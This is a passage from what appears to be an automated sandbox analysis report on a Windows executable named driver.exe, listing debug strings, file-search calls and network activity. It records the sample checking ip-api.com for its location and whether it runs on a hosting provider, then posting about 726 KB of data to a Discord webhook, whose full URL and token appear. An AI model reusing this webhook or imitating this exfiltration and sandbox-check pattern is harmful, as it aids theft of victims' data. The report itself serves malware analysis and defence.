sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: driver.exe, 00000002.00000002.2448164791.00007FF8A84C2000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2456490547.00007FF8B9F74000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.pdb source: powershell.exe, 0000002F.00000002.2261891481.0000028F80385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: driver.exe, 00000002.00000002.2452545913.00007FF8B7DF1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: driver.exe, 00000002.00000002.2455696626.00007FF8B93C1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: driver.exe, 00000002.00000002.2452292275.00007FF8A8EF1000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: driver.exe, 00000002.00000002.2453359812.00007FF8B7E51000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: driver.exe, 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: driver.exe, 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: driver.exe, 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: driver.exe, driver.exe, 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: driver.exe, 00000000.00000003.2050665502.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: driver.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: driver.exe, 00000002.00000002.2454712947.00007FF8B8B3B000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: driver.exe, 00000002.00000002.2455998173.00007FF8B9841000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: driver.exe, 00000002.00000002.2454106900.00007FF8B8AF1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.pdbhP source: powershell.exe, 0000002F.00000002.2261891481.0000028F80385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6A29B83B0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29B92F0 FindFirstFileExW,FindClose,0_2_00007FF6A29B92F0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6A29D18E4
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29B92F0 FindFirstFileExW,FindClose,2_2_00007FF6A29B92F0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6A29B83B0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6A29D18E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542646EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,77_2_00007FF7542646EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542A88E0 FindFirstFileExA,77_2_00007FF7542A88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,77_2_00007FF75425E21C

              Networking

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: global trafficTCP traffic: 192.168.2.5:51955 -> 162.159.36.2:53
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
              Source: unknownDNS query: name: ip-api.com
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1326920011201118251/xRN_dhCbCT8HeZRae0xJk1yw1sh06GaK4mq7ylVag5fFfCbHC0_LWfgjquGILOcXtJ2V HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 726172User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=de3ccc329bb54b36f6288e69cf93885a
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 10:00:41 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736503243x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NV9omaOnoMiwOGvkRDgo7SiGweJrmgfyLVRfBNckAnW2%2Bz92ZiQGy9Gam2yFFlgXYRpsX1ImMt%2BsUGDqL9wo75RjJQw%2BBT%2BHnhGewl%2F80WkPXiscRONUgxymqGbz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=498f3b3fed20652a61917c341884d7aa84696853-1736503241; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=VbHab4IqB6lQjgKMolM4ulgWWvtlWgKW2e_NqXUOIoc-1736503241973-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ffbd24abd5d43af-EWR
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digiN
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: driver.exe, 00000002.00000003.2188298866.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149672861.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE1DE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2248423197.000001A9CE030000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2319612460.0000028FF7F10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3297044409.000002106B68D000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000003.2218706079.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000002.2497855608.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000003.2220783237.00000224C5264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 0000002F.00000002.2321765178.0000028FF8040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: svchost.exe, 00000030.00000002.3296597335.000002106B600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: driver.exe, 00000002.00000003.2076155450.000001C0EDC78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: svchost.exe, 00000030.00000003.2157180555.000002106B800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: driver.exe, 00000002.00000003.2188298866.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149672861.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE1DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE235000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE237000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE237000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
              Source: powershell.exe, 0000000E.00000002.2243088797.000001A9C5C53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F8196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000E.00000002.2214718488.000001A9B5E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000E.00000002.2214718488.000001A9B5BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
